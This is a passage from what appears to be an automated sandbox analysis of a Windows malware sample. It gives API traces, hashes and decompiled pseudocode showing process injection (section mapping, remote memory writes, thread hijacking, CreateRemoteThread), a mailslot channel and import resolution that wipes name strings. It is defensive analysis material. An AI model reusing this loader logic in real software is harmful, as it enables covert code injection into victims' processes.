  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 5
  • API ID: VirtualAllocVirtualFreelstrcpynmemcpy
  • String ID: Apr 14 2018$pnls$pnls
  • API String ID: 1980370899-1480254790
  • Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
  • Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
  • Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
  • Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
APIs
  • lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
  • memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
